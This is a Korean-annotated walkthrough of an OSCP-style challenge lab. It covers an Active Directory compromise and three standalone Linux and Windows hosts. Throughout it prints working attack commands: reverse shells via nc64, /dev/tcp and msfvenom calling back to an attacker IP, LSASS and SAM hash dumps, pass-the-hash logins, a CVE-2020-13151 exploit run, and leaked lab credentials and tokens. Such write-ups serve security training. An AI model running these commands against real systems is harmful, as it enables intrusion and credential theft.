Information
About this lab
This lab involves a sophisticated attack chain against an Active Directory environment. Learners begin by exploiting a vulnerable webapp to achieve remote code execution, followed by privilege escalation Privilege abuse. Through lateral movement, pivoting across network segments, and cracking Kerberos tickets, learners must enumerate and compromise domain assets to achieve full domain control.
Active Directory Set
192.168.122.141 - MS01
Eric.Wallows / EricLikesRunning800
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5985/tcp open wsman
Initial Access
Evil-WinRM
Privilege Escalation
Evil-WinRM
- SeImpersonatePrivilege 권한 존재
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 192.168.122.141 -u 'Eric.Wallows' -p 'EricLikesRunning800'
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone EnabledPrintSpoofer64
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload PrintSpoofer64.exe
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload nc64.exe
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\PrintSpoofer64.exe -c "nc64.exe 192.168.45.219 4444 -e powershell"nc
- 관리자 권한 획득
┌──(kali㉿kali)-[~/oscp_a]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.219] from (UNKNOWN) [192.168.122.141] 55321
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32> Post-Exploitation
eric.wallows계정 Administrator localgroup 추가
PS C:\Users> net localgroup Administrators eric.wallows /add
net localgroup Administrators eric.wallows /add
The command completed successfully.nxc lsassy dump
nxc lsassy dump
- celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd
- Mary.Williams:9a3121977ee93af56ebd0ef4f527a35e
```bash
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc smb 192.168.122.141 -u 'Eric.Wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.122.141 445 MS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS01) (domain:oscp.exam) (signing:False) (SMBv1:False)
SMB 192.168.122.141 445 MS01 [+] oscp.exam\Eric.Wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.122.141 445 MS01 OSCP\celia.almeda e728ecbadfb02f51ce8eed753f3ff3fd
LSASSY 192.168.122.141 445 MS01 MS01\Mary.Williams 9a3121977ee93af56ebd0ef4f527a35e
Pivoting
kali
┌──(kali㉿kali)-[~/oscp_a]
└─$ sudo ligolo-proxy -selfcert
[sudo] password for kali:
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0182] Agent joined. id=005056ab00d4 name="NT AUTHORITY\\SYSTEM@MS01" remote="192.168.122.141:53233"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - NT AUTHORITY\SYSTEM@MS01 - 192.168.122.141:53233 - 005056ab00d4
[Agent : NT AUTHORITY\SYSTEM@MS01] » interface_create --name ligolo
INFO[0189] Creating a new ligolo interface...
INFO[0189] Interface created!
[Agent : NT AUTHORITY\SYSTEM@MS01] » start
INFO[0192] Starting tunnel to NT AUTHORITY\SYSTEM@MS01 (005056ab00d4)
[Agent : NT AUTHORITY\SYSTEM@MS01] » route_add --name ligolo --route 10.10.184.0/24
INFO[0219] Route created.windows
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\agent.exe -connect 192.168.45.219:11601 -ignore-cert10.10.184.142 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsmanInitial Access
nxc
- oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc winrm 10.10.184.140 10.10.184.142 -u users.txt -H hashes.txt -t 100
WINRM 10.10.184.140 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:oscp.exam)
WINRM 10.10.184.142 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.184.142 5985 MS02 [+] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)evil-winrm
┌──(kali㉿kali)-[~/oscp_a]└─$ evil-winrm -i 10.10.184.142 -u 'celia.almeda' -H 'e728ecbadfb02f51ce8eed753f3ff3fd' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\celia.almeda\Documents>Privilege Escalation
SAM, SYSTEM 파일 다운로드
*Evil-WinRM* PS C:\windows.old\Windows\System32> download SAM
*Evil-WinRM* PS C:\windows.old\Windows\System32> download SYSTEM해시 덤프
- Administrator:31d6cfe0d16ae931b73c59d7e0c089c0
- tom_admin:4979d69d4ca66955c075c41cf45f24dc
- Cheyanne.Adams:b3930e99899cb55b4aefef9a7021ffd0
- David.Rhys:9ac088de348444c71dba2dca92127c11
- Mark.Chetty:92903f280e5c5f3cab018bd91b94c771
┌──(kali㉿kali)-[~/oscp_a]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8bca2f7ad576c856d79b7111806b533d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:acbb9b77c62fdd8fe5976148a933177a:::
tom_admin:1001:aad3b435b51404eeaad3b435b51404ee:4979d69d4ca66955c075c41cf45f24dc:::
Cheyanne.Adams:1002:aad3b435b51404eeaad3b435b51404ee:b3930e99899cb55b4aefef9a7021ffd0:::
David.Rhys:1003:aad3b435b51404eeaad3b435b51404ee:9ac088de348444c71dba2dca92127c11:::
Mark.Chetty:1004:aad3b435b51404eeaad3b435b51404ee:92903f280e5c5f3cab018bd91b94c771:::nxc
- tom_admin:4979d69d4ca66955c075c41cf45f24dc (Pwn3d!)
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc winrm 10.10.184.142 -u users.txt -H hashes.txt --continue-on-success -t 100
WINRM 10.10.184.142 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Aimee.Hunt:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Carol.Webb:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [+] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd zip() argument 2 is longer than argument 1
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Chelsea.Byrne:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Donna.Johnson:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Emily.Bishop:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\eric.wallows:e728ecbadfb02f51ce8eed753f3ff3fd
WIN
WINRM 10.10.184.142 5985 MS02 [+] oscp.exam\tom_admin:4979d69d4ca66955c075c41cf45f24dc (Pwn3d!)evil-winrm
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.184.142 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tom_admin\Documents>10.10.184.140 - DC01
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInitial Access (Administrator Privilege)
evil-winrm
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.184.140 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tom_admin\Documents> proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/12/2025 6:50 AM 34 proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
a728672bb26239bb2587cc98b930bb55Independent Challenges
192.168.122.143 - Aero
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
443/tcp open https
3000/tcp open ppp
3001/tcp open nessus
3003/tcp open cgms
3306/tcp open mysql
5432/tcp open postgresqlInitial Access
81 포트로 웹 서비스 접근
- 소스코드에서 “Attendance and Payroll System” 문구 발견
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Attendance and Payroll System</title>“3003/tcp open cgms” 검색 → Aerospike Database 5.1.0.3 - OS Command Execution (CVE-2020-13151) 발견
POC https://github.com/b4ny4n/CVE-2020-13151
┌──(kali🎃kali)-[~/oscp_a/143/CVE-2020-13151]
└─$ python cve2020-13151.py --ahost 192.168.122.143 --netcatshell --lhost=192.168.45.219 --lport=3000
[+] aerospike build info: 5.1.0.1
[+] looks vulnerable
[+] populating dummy table.
[+] writing to test.cve202013151
[+] wrote MzTztxQFPOETJUBD
[+] registering udf
[+] sending payload, make sure you have a listener on 192.168.45.219:3000.....
nc
┌──(kali🎃kali)-[~]
└─$ rlwrap nc -nlvp 3000
listening on [any] 3000 ...
connect to [192.168.45.219] from (UNKNOWN) [192.168.122.143] 58878
/bin/sh: 0: can't access tty; job control turned off
$ shell spawning
python -c 'import pty; pty.spawn("/bin/bash")'local.txt
aero@oscp:/home/aero$ cat local.txt
cat local.txt
d215e07defe543400153f2fb5c6f30f3Privilege Escalation
linpeas upload via scp
- kali → target
aero@oscp:/etc$ scp kali@192.168.45.219:~/oscp_a/tools/linpeas.sh /tmp/
scp kali@192.168.45.219:~/oscp_a/tools/linpeas.sh /tmp/
The authenticity of host '192.168.45.219 (192.168.45.219)' can't be established.
ECDSA key fingerprint is SHA256:vRI4BwMX0mkIFr1rxD1EuPqzvvum/BOX43B/o3MN8ps.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Warning: Permanently added '192.168.45.219' (ECDSA) to the list of known hosts.
kali@192.168.45.219's password: kali
linpeas.sh 100% 953KB 1.3MB/s 00:00 linpeas
- /root/aerospike.sh가 1분마다 실행되고 있음
- 루트 권한만 접근 권한 있어서 자세한건 확인 불가
╔══════════╣ Check for vulnerable cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
══╣ Cron jobs list
*/1 * * * * root /root/aerospike.shpspy64s
- /opt/aerospike/bin/asadm이 주기적으로 실행되고 있음
2025/12/13 17:24:08 CMD: UID=0 PID=65228 | python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS'
2025/12/13 17:24:09 CMD: UID=0 PID=65230 | python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS' - 접근 가능
aero@oscp:/$ ls -al /opt/aerospike/bin/asadm
ls -al /opt/aerospike/bin/asadm
-rwxr-xr-x 1 aero aero 6723733 Dec 7 2019 /opt/aerospike/bin/asadmoverwrite asadm
aero@oscp:/$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.219/443 0>&1'" > /opt/aerospike/bin/asadm
<92.168.45.219/443 0>&1'" > /opt/aerospike/bin/asadmproof.txt
┌──(kali🎃kali)-[~/oscp_a/143]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.219] from (UNKNOWN) [192.168.122.143] 50914
bash: cannot set terminal process group (66614): Inappropriate ioctl for device
bash: no job control in this shell
root@oscp:/#
root@oscp:~# cat /root/proof.txt
cat /root/proof.txt
7892ec77669dc931577f4eac740479f5192.168.122.144 - Crystal
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpInitial Access
nmap script
- git repository 발견
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: Nicepage 4.21.12, nicepage.com
|_http-title: Home
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-git:
| 192.168.122.144:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: Security Update
| Remotes:
|_ https://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@github.com/PWK-Challenge-Lab/dev.githttp 접속
http://192.168.122.144/.git/
wget으로 git repository 덤프
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ wget -r "http://192.168.122.144/.git/"git log
┌──(kali🎃kali)-[~/oscp_a/144/192.168.122.144/.git]
└─$ git log
commit 44a055daf7a0cd777f28f444c0d29ddf3ff08c54 (HEAD -> main)
Author: Stuart <luke@challenge.pwk>
Date: Fri Nov 18 16:58:34 2022 -0500
Security Update
commit 621a2e79b3a4a08bba12effe6331ff4513bad91a (origin/main, origin/HEAD)
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 23:57:12 2022 +0200
Create database.php
commit c9c8e8bd0a4b373190c4258e16e07a6296d4e43c
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 23:56:19 2022 +0200
Delete database.php
commit eda55ed6455d29532295684e3900cda74d695067
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:27:40 2022 +0200
Create robots.txt
commit ce3d418cc1bb5c5388fdc00cee5ba1cb764f499b
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:27:08 2022 +0200
Create search.php
commit 80ad5fe45438bb1b9cc5932f56af2e9be7e96046
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:26:09 2022 +0200
Setting up database.php
commit 58cfadc91978ec5db50a03c571493e3038d2935d
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:22:48 2022 +0200
Create index.php
commit 5e212bcd0b8d5815af1c4fdfccd6a07c16e1330b
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:22:22 2022 +0200
Create order.php
commit 0822a51f607bb05c0e6230acd74f27e7b6130934
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:21:50 2022 +0200
Create export.php
commit 1c48db4a587970ee95208f3f408676505e343318
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:21:11 2022 +0200
Initial commitgit show
- 계정 발견
- stuart@challenge.lab / BreakingBad92
┌──(kali🎃kali)-[~/oscp_a/144/192.168.122.144/.git]
└─$ git show 44a055daf7a0cd777f28f444c0d29ddf3ff08c54
commit 44a055daf7a0cd777f28f444c0d29ddf3ff08c54 (HEAD -> main)
Author: Stuart <luke@challenge.pwk>
Date: Fri Nov 18 16:58:34 2022 -0500
Security Update
diff --git a/configuration/database.php b/configuration/database.php
index 55b1645..8ad08b0 100644
--- a/configuration/database.php
+++ b/configuration/database.php
@@ -2,8 +2,9 @@
class Database{
private $host = "localhost";
private $db_name = "staff";
- private $username = "stuart@challenge.lab";
- private $password = "BreakingBad92";
+ private $username = "";
+ private $password = "";
+// Cleartext creds cannot be added to public repos!
public $conn;
public function getConnection() {
$this->conn = null;발견한 계정으로 ssh 로그인
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ ssh stuart@192.168.122.144
The authenticity of host '192.168.122.144 (192.168.122.144)' can't be established.
ED25519 key fingerprint is: SHA256:NQ0P6b7BgHDdEToc64di95hvEzS2pdZ7E02r4ZBkBYM
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:56: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.122.144' (ED25519) to the list of known hosts.
stuart@192.168.122.144's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-53-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Dec 14 03:15:24 PM UTC 2025
System load: 0.0 Processes: 201
Usage of /: 39.9% of 18.53GB Users logged in: 0
Memory usage: 7% IPv4 address for ens160: 192.168.122.144
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Oct 31 14:48:02 2022 from 192.168.118.5
stuart@oscp:~$local.txt
stuart@oscp:~$ cat local.txt
cfd945bb16d2480927d571c2deef9ceePrivilege Escalation
linpeas
- backup folder
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Nov 18 2022 /opt/backup
total 84
-rw-r--r-- 1 stuart stuart 26890 Apr 5 2018 sitebackup1.zip
-rw-r--r-- 1 stuart stuart 24701 Nov 18 2022 sitebackup2.zip
-rw-r--r-- 1 stuart stuart 25312 Mar 5 2020 sitebackup3.zip
drwxr-xr-x 2 root root 3 Apr 15 2020 /snap/core20/1405/var/backups
total 0
drwxr-xr-x 2 root root 3 Apr 15 2020 /snap/core20/1695/var/backups
total 0
drwxr-xr-x 2 root root 4096 Dec 14 15:04 /var/backups
total 724
-rw-r--r-- 1 root root 51200 Dec 14 14:51 alternatives.tar.0
-rw-r--r-- 1 root root 36870 Nov 18 2022 apt.extended_states.0
-rw-r--r-- 1 root root 0 Dec 14 14:51 dpkg.arch.0
-rw-r--r-- 1 root root 268 Oct 31 2022 dpkg.diversions.0
-rw-r--r-- 1 root root 135 Nov 18 2022 dpkg.statoverride.0
-rw-r--r-- 1 root root 636365 Nov 18 2022 dpkg.status.0scp로 백업 파일 다운
stuart@oscp:/opt/backup$ scp sitebackup1.zip kali@192.168.45.199:~/oscp_a/144/
The authenticity of host '192.168.45.199 (192.168.45.199)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.45.199' (ED25519) to the list of known hosts.
kali@192.168.45.199's password:
sitebackup1.zip 100% 26KB 114.0KB/s 00:00
stuart@oscp:/opt/backup$ scp sitebackup2.zip kali@192.168.45.199:~/oscp_a/144/
kali@192.168.45.199's password:
sitebackup2.zip 100% 24KB 109.9KB/s 00:00
stuart@oscp:/opt/backup$ scp sitebackup3.zip kali@192.168.45.199:~/oscp_a/144/
kali@192.168.45.199's password:
sitebackup3.zip7z으로 압축 해제
- 비밀번호 필요
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ 7z x sitebackup3.zip
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 25312 bytes (25 KiB)
Extracting archive: sitebackup3.zip
--
Path = sitebackup3.zip
Type = zip
Physical Size = 25312
Enter password (will not be echoed):zip2john으로 비밀번호 해시 추출
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ zip2john sitebackup3.zip > sitebackup3_hashes.hash
ver 2.0 sitebackup3.zip/joomla/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/administrator/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/api/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/cache/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/cli/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/components/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/images/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/includes/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/language/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/language/overrides/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/layouts/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/libs/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/media/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/modules/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/plugins/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/templates/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/tmp/ is not encrypted, or stored with non-handled compression typejohn으로 비밀번호 크랙
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sitebackup3_hashes.hash
Using default input encoding: UTF-8
Loaded 19 password hashes with 19 different salts (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Loaded hashes with cost 1 (HMAC size) varying from 28 to 6535
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
codeblue (sitebackup3.zip/joomla/language/.DS_Store)
codeblue (sitebackup3.zip/joomla/includes/app.php)
codeblue (sitebackup3.zip/joomla/web.config.txt)
codeblue (sitebackup3.zip/joomla/cli/joomla.php)
codeblue (sitebackup3.zip/joomla/cli/index.html)
codeblue (sitebackup3.zip/joomla/htaccess.txt)
codeblue (sitebackup3.zip/joomla/LICENSE.txt)
codeblue (sitebackup3.zip/joomla/includes/index.html)
codeblue (sitebackup3.zip/joomla/language/overrides/index.html)
codeblue (sitebackup3.zip/joomla/cache/index.html)
codeblue (sitebackup3.zip/joomla/includes/defines.php)
codeblue (sitebackup3.zip/joomla/README.txt)
codeblue (sitebackup3.zip/joomla/language/index.html)
codeblue (sitebackup3.zip/joomla/.DS_Store)
codeblue (sitebackup3.zip/joomla/includes/framework.php)
codeblue (sitebackup3.zip/joomla/index.php)
codeblue (sitebackup3.zip/joomla/configuration.php)
codeblue (sitebackup3.zip/joomla/robots.txt)
codeblue (sitebackup3.zip/joomla/tmp/index.html)
19g 0:00:00:23 DONE (2025-12-14 10:48) 0.8109g/s 1748p/s 33215c/s 33215C/s holabebe..loserface1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.비밀번호 가지고 7z으로 압축 해제
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ 7z x sitebackup3.zip
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 25312 bytes (25 KiB)
Extracting archive: sitebackup3.zip
--
Path = sitebackup3.zip
Type = zip
Physical Size = 25312
Enter password (will not be echoed):
Everything is Ok
Folders: 17
Files: 19
Size: 67063
Compressed: 25312압축 해제 된 파일들에서 비밀번호 검색
- → configuration.php
┌──(kali🎃kali)-[~/oscp_a/144/joomla]
└─$ grep -r -i 'passw' *
configuration.php: public $password = 'Password@1';configuration.php 파일에서 아이디/비밀번호 발견
- → chloe / Ee24zIK4cDhJHL4H
┌──(kali🎃kali)-[~/oscp_a/144/joomla]
└─$ cat configuration.php
<?php
class JConfig {
public $offline = false;
public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
public $display_offline_message = 1;
public $offline_image = '';
public $sitename = 'Challenge Lab';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = 20;
public $access = 1;
public $debug = false;
public $debug_lang = false;
public $debug_lang_const = true;
public $dbtype = 'mysql';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'Password@1';
public $db = 'jooml';
public $dbprefix = 'o83rl_';
public $dbencryption = 0;
public $dbsslverifyservercert = false;
public $dbsslkey = '';
public $dbsslcert = '';
public $dbsslca = '';
public $dbsslcipher = '';
public $force_ssl = 0;
public $live_site = '';
public $secret = 'Ee24zIK4cDhJHL4H';chloe로 계정 전환
stuart@oscp:~$ su chloe
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
chloe@oscp:/home/stuart$sudo 권한 확인
- 전부 있음
- → root로 계정 전환
chloe@oscp:/home/stuart$ sudo -l
[sudo] password for chloe:
Matching Defaults entries for chloe on oscp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User chloe may run the following commands on oscp:
(ALL : ALL) ALL
chloe@oscp:/home/stuart$
chloe@oscp:/home/stuart$ sudo su -
root@oscp:~#proof.txt
root@oscp:~# cat /root/proof.txt
7ca5ec703d5a4a2074b6fe1153db351a192.168.122.145 - Hermes
Nmap
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1978/tcp open unisql
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
161/udp open snmpInitial Access
“1978/tcp open unisql” 검색
poc를 위해 리버스 쉘 바이너리 파일 생성 후 파이썬 서버 실행
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.219 LPORT=4444 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exe
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ l
49601 payload.exe scan whatweb
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...poc 실행
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ python2 49601 192.168.122.145 192.168.45.219:8000 payload.exe
[+] 3..2..1..
[+] *Super fast hacker typing*
[+] Retrieving payload
[+] Done! Check Your Listener?리버스쉘 연결 성공
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.219] from (UNKNOWN) [192.168.122.145] 50609
Microsoft Windows [Version 10.0.19041.1]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32local.txt
PS C:\Users\offsec\Desktop> dir
dir
Directory: C:\Users\offsec\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/15/2025 5:07 AM 34 local.txt
PS C:\Users\offsec\Desktop> type local.txt
type local.txt
6a68dc6059ee54a8bee83a5ba5652452Privilege Escalation
winpeas
- putty sessions에서 zachary 계정 아이디/비밀번호 확인
- zachary / Th3R@tC@tch3r
Putty Sessions
RegKey Name: zachary
RegKey Value: "&('C:\Program Files\PuTTY\plink.exe') -pw 'Th3R@tC@tch3r' zachary@10.51.21.12 'df -h'"
=================================================================================================rdp 접속
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ xfreerdp3 /u:'zachary' /p:'Th3R@tC@tch3r' /v:192.168.122.145 proof.txt
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 2879-D413
Directory of C:\Users\Administrator\Desktop
